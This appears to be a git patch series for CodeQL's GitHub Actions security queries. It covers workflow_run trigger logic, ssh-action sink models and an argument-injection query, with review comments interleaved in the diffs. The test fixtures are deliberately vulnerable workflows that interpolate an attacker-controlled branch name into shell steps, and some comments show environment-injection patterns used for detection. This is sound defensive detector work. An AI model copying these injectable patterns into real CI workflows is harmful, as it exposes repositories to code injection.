b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index e0164eafac85..05931dfe3121 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -6,3 +6,4 @@ | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From f4dd771d1cc1dd791e4d74ffed89093bf5cdc455 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 10 Jul 2024 11:49:18 +0200
Subject: [PATCH 389/707] feat(models): Add models for ssh-action

---
 ql/lib/ext/manual/appleboy_ssh-action.model.yml | 8 ++++++++
 1 file changed, 8 insertions(+)
 create mode 100644 ql/lib/ext/manual/appleboy_ssh-action.model.yml

diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/ql/lib/ext/manual/appleboy_ssh-action.model.yml
new file mode 100644
index 000000000000..c489f8edc85c
--- /dev/null
+++ b/ql/lib/ext/manual/appleboy_ssh-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSinkModel
+ data:
+ - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"]
+ - ["appleboy/ssh-action", "*", "input.envs", "envvar-injection", "manual"]
+
From f1d1c1e55a2c07e756dd7fa4635cc29c2a248798 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 10 Jul 2024 11:49:37 +0200
Subject: [PATCH 390/707] Bump QL versions

---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 554ef6bbe7f3..3d20e00dddea 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.15
+version: 0.1.16
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index e72b14fb3582..6b41b38f9a4c 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.15
+version: 0.1.16
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 53b88627e5eb15bcee5f524fb7884321dbb77eae Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 10 Jul 2024 12:15:49 +0200
Subject: [PATCH 391/707] feat(core): Exclude worflow_run#branches#default branch from externally triggerable events

---
 ql/lib/codeql/actions/Helper.qll | 8 ++++++++
 ql/lib/codeql/actions/ast/internal/Ast.qll | 13 ++++++++++++-
 .../codeql/actions/security/CachePoisoningQuery.qll | 11 +----------
 .../.github/workflows/workflow_run_branches1.yml | 13 +++++++++++++
 .../.github/workflows/workflow_run_branches2.yml | 13 +++++++++++++
 .../.github/workflows/workflow_run_branches3.yml | 12 ++++++++++++
 .../Security/CWE-094/CodeInjectionCritical.expected | 4 ++++
 .../Security/CWE-094/CodeInjectionMedium.expected | 5 +++++
 8 files changed, 68 insertions(+), 11 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml

diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll
index 3c7091d2a85d..b08b62c8a583 100644
--- a/ql/lib/codeql/actions/Helper.qll
+++ b/ql/lib/codeql/actions/Helper.qll
@@ -1,5 +1,6 @@
 private import codeql.actions.Ast
 private import codeql.Locations
+import codeql.actions.config.Config
 private import codeql.actions.security.ControlChecks
 
 bindingset[expr]
@@ -264,3 +265,10 @@ predicate outputsPartialFileContent(string snippet) {
 ".*"
 ])
 }
+
+string defaultBranchNames() {
+ repositoryDataModel(_, result)
+ or
+ not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and
+ result = ["main", "master"]
+}
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index bb31e198cc62..e2dfd6076df7 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
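Review bot: `import codeql.actions.config.Config` is the only non-private import in Helper.qll's header, so every module that imports Helper now also sees Config's predicates; unless that re-export is intended, `private import codeql.actions.config.Config` resolves `repositoryDataModel` for the new predicate without widening Helper's public surface. The `defaultBranchNames()` moved into Helper in the second hunk also arrives without a QLDoc comment, which was tolerable while it was local to CachePoisoningQuery.qll but not for a shared helper; something like `/** Gets the repository's default branch name(s): the configured repository data model value, or main and master when none is configured. */` states the fallback callers rely on.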
@@ -710,7 +710,18 @@ class EventImpl extends AstNodeImpl, TEventNode {
 /** Holds if the event can be triggered by an external actor. */
 predicate isExternallyTriggerable() {
 // the job is triggered by an event that can be triggered externally
- externallyTriggerableEventsDataModel(this.getName())
+ // except for workflow_run which requires additional checks
+ externallyTriggerableEventsDataModel(this.getName()) and
+ not this.getName() = "workflow_run"
+ or
+ this.getName() = "workflow_run" and
+ // workflow_run cannot be externally triggered if they triggering workflow runs in the context of the default branch
+ // since an attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow
+ // but in that case, the triggering workflow will run in the context of the PR head branch
+ (
+ not exists(this.getAPropertyValue("branches")) or
+ not this.getAPropertyValue("branches") = defaultBranchNames()
+ )
 or
 // the event is `workflow_call` and there is a caller workflow that can be triggered externally
 this.getName() = "workflow_call" and
diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
index 1a3e7b2b2f7c..29c0ed4feed0 100644
--- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
+++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
@@ -1,5 +1,6 @@
 import actions
 import codeql.actions.config.Config
+import codeql.actions.Helper
 
 string defaultBranchTriggerEvent() {
 result =
@@ -11,16 +12,6 @@ string defaultBranchTriggerEvent() {
 ]
 }
 
-string defaultBranchNames() {
- exists(string default_branch_name |
- repositoryDataModel(_, default_branch_name) and
- result = default_branch_name
- )
- or
- not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and
- result = ["main", "master"]
-}
-
 predicate runsOnDefaultBranch(Event e) {
 (
 e.getName() = defaultBranchTriggerEvent() and
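Review bot: The new `workflow_run` disjunct treats a `branches` filter that names a default branch as proof that the run is not externally triggerable, but if I read the trigger semantics correctly the `branches` filter of `workflow_run` is matched against the triggering run's head branch, and for a triggering `pull_request` run that is the PR's head branch name rather than a branch of the base repository, so a literal `main` entry does not by itself establish the default-branch context the comment above it relies on; the conservative choice for a security query is to keep such events externally triggerable, and the follow-up hunk in PATCH 392 changes the comparison but keeps this assumption. Independently, `not this.getAPropertyValue("branches") = defaultBranchNames()` fails as soon as any one listed value matches, so `branches: [main, dev]` is classified as non-triggerable because of `main` alone. The comment line `// workflow_run cannot be externally triggered if they triggering workflow runs ...` reads "they" for "the". `defaultBranchNames()` now resolves through Helper, whose import into Ast.qll is not part of this hunk, so presumably it is already present; `isExternallyTriggerable()` itself continues past the hunk.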
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml
new file mode 100644
index 000000000000..7920e649da80
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml
@@ -0,0 +1,13 @@
+name: Self-hosted runner (AMD mi250 CI caller)
+
+on:
+ workflow_run:
+ workflows: ["Test"]
+ branches: ["main"]
+ types: [completed]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.workflow_run.head_branch }}
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml
new file mode 100644
index 000000000000..601ad558fa0c
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml
@@ -0,0 +1,13 @@
+name: Self-hosted runner (AMD mi250 CI caller)
+
+on:
+ workflow_run:
+ workflows: ["Test"]
+ branches: "main"
+ types: [completed]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.workflow_run.head_branch }}
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml
new file mode 100644
index 000000000000..833d655d3e59
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml
@@ -0,0 +1,12 @@
+name: Self-hosted runner (AMD mi250 CI caller)
+
+on:
+ workflow_run:
+ workflows: ["Test"]
+ types: [completed]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.workflow_run.head_branch }}
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 6dfb91f72757..863fa67f116d 100644
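Review bot: workflow_run_branches1-3 differ only in how `branches` is written (list, scalar, absent), which is exactly what the Ast.qll change keys on, but none of the three says which shape it exercises, so a later change to the expected files has to be re-derived from the logic. A first-line comment per fixture, e.g. `# workflow_run with a list-valued branches filter naming the default branch` for branches1 and the scalar / absent variants for the other two, would make the expected rows reviewable on their own. The same applies to workflow_run_branches4.yml (wildcard pattern) added in PATCH 393.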
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -295,6 +295,9 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | 
@@ -388,3 +391,4 @@ subpaths | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 11036e7f8ebe..f2fd5923034f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -295,6 +295,9 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | 
@@ -325,3 +328,5 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} |
+| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} |
From 090b3d41d165c3d3d2d2deef8e12592515748790 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 10 Jul 2024 13:08:54 +0200
Subject: [PATCH 392/707] Fix branches logic

---
 ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +-
 .../query-tests/Security/CWE-094/CodeInjectionCritical.expected | 2 ++
 .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 +
 3 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index e2dfd6076df7..9416b39e1059 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -720,7 +720,7 @@ class EventImpl extends AstNodeImpl, TEventNode {
 // but in that case, the triggering workflow will run in the context of the PR head branch
 (
 not exists(this.getAPropertyValue("branches")) or
- not this.getAPropertyValue("branches") = defaultBranchNames()
+ this.getAPropertyValue("branches").matches("%*%")
 )
 or
 // the event is `workflow_call` and there is a caller workflow that can be triggered externally
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index 863fa67f116d..3330ad89311f 100644
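Review bot: `this.getAPropertyValue("branches").matches("%*%")` recognises only `*` as a wildcard, while GitHub branch filter patterns also use `?`, `+`, `[...]` and a leading `!` negation, so a filter such as `branches: ["release-?"]` is still classified as not externally triggerable; `this.getAPropertyValue("branches").regexpMatch(".*[*?+\\[!].*")` covers the documented pattern characters. The three comment lines directly above the parenthesis (outside this hunk) still explain the old default-branch comparison, so after this change they should say that only wildcard-free branch filters are taken to restrict the trigger. `defaultBranchNames()` is no longer referenced from this predicate, which may leave the Helper import in Ast.qll unused; that cannot be confirmed from the hunk. `isExternallyTriggerable()` begins and ends outside the hunk.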
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -298,6 +298,7 @@ nodes | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | 
@@ -392,3 +393,4 @@ subpaths | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index f2fd5923034f..e325205d8c89 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -298,6 +298,7 @@ nodes | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | From 621ead2266e45d147494872f02716597c23f6d8b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 13:09:23 +0200 Subject: [PATCH 393/707] Fix branches logic --- .../.github/workflows/workflow_run_branches4.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml
new file mode 100644
index 000000000000..8540c3ef2270
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml
@@ -0,0 +1,13 @@
+name: Self-hosted runner (AMD mi250 CI caller)
+
+on:
+ workflow_run:
+ workflows: ["Test"]
+ branches: ["feat/**"]
+ types: [completed]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.workflow_run.head_branch }}
From 73c77bc93bf1dd99093e229722b4a3808067a7cb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 10 Jul 2024 15:35:51 +0200
Subject: [PATCH 394/707] Initial implementation

Pending work: complete the regular expression

---
 ql/lib/codeql/actions/dataflow/FlowSteps.qll | 71 +++++++++++-------
 .../security/ArgumentInjectionQuery.qll | 73 +++++++++++++++++++
 .../security/EnvPathInjectionQuery.qll | 2 +-
 .../actions/security/EnvVarInjectionQuery.qll | 2 +-
 ql/lib/ext/config/poisonable_steps.yml | 1 -
 .../CWE-094/ArgumentInjectionCritical.ql | 26 +++++++
 .../CWE-094/ArgumentInjectionMedium.ql | 26 +++++++
 .../Security/CWE-094/CodeInjectionCritical.ql | 1 -
 .../Security/CWE-094/CodeInjectionMedium.ql | 1 -
 .../.github/workflows/arg_injection.yml | 20 +++++
 .../ArgumentInjectionCritical.expected | 8 ++
 .../CWE-094/ArgumentInjectionCritical.qlref | 1 +
 .../CWE-094/ArgumentInjectionMedium.expected | 7 ++
 .../CWE-094/ArgumentInjectionMedium.qlref | 1 +
 14 files changed, 208 insertions(+), 32 deletions(-)
 create mode 100644 ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll
 create mode 100644 ql/src/Security/CWE-094/ArgumentInjectionCritical.ql
 create mode 100644 ql/src/Security/CWE-094/ArgumentInjectionMedium.ql
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml
 create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected
 create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref
 create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected
 create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref

diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
index 46c42da26521..ca0b7a70159d 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll
@@ -8,6 +8,7 @@ private import codeql.actions.DataFlow
 private import codeql.actions.dataflow.FlowSources
 private import codeql.actions.dataflow.ExternalFlow
 private import codeql.actions.security.ArtifactPoisoningQuery
+private import codeql.actions.security.ArgumentInjectionQuery
 
 /**
  * A unit class for adding additional taint steps.
@@ -23,6 +24,42 @@ class AdditionalTaintStep extends Unit {
 abstract predicate step(DataFlow::Node node1, DataFlow::Node node2);
 }
 
+bindingset[var_name, value]
+predicate envToRunExpr(string var_name, Run run, string value) {
+ // e.g. echo "FOO=$BODY" >> $GITHUB_ENV
+ // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV
+ value.matches("%$" + ["", "{", "ENV{"] + var_name + "%")
+ or
+ // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV
+ value.matches("$(echo %") and value.indexOf(var_name) > 0
+ or
+ // e.g.
+ // FOO=$(echo $BODY)
+ // echo "FOO=$FOO" >> $GITHUB_ENV
+ exists(string line, string var2_name, string var2_value | run.getScript().splitAt("\n") = line |
+ var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and
+ var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and
+ var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and
+ (
+ value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%")
+ or
+ value.matches("$(echo %") and value.indexOf(var2_name) > 0
+ )
+ )
+}
+
+bindingset[var_name]
+predicate envToArgInjSink(string var_name, Run run, string command) {
+ exists(string argument, string line, string regexp, int command_group, int argument_group |
+ run.getScript().splitAt("\n") = line and
+ argumentInjectionSinks(regexp, command_group, argument_group) and
+ argument = line.regexpCapture(regexp, argument_group) and
+ command = line.regexpCapture(regexp, command_group) and
+ envToRunExpr(var_name, run, argument) and
+ exists(run.getInScopeEnvVarExpr(var_name))
+ )
+}
+
 /**
  * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file.
  * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH
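Review bot: In `envToRunExpr` the first two disjuncts never mention `run`, so under `bindingset[var_name, value]` the predicate holds for every `Run` in the database whenever `value` textually contains the variable; the two callers bind `run` so results are unaffected, but the signature suggests `run` matters everywhere, which deserves a comment such as `// run only constrains the third disjunct (indirection through a second shell variable)`. The matching itself is a substring test: both `matches("%$" + ["", "{", "ENV{"] + var_name + "%")` and `value.indexOf(var_name) > 0` accept `$BODY_TEXT` for `var_name = "BODY"`, an over-approximation that is tolerable for a taint step but should be stated in a QLDoc comment, which neither new predicate has. In `envToArgInjSink`, `argumentInjectionSinks` comes from the new ArgumentInjectionQuery.qll, whose contents lie outside this chunk, so the contract of `regexp`, `command_group` and `argument_group` cannot be checked here; the commit message itself calls the regular expression unfinished.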
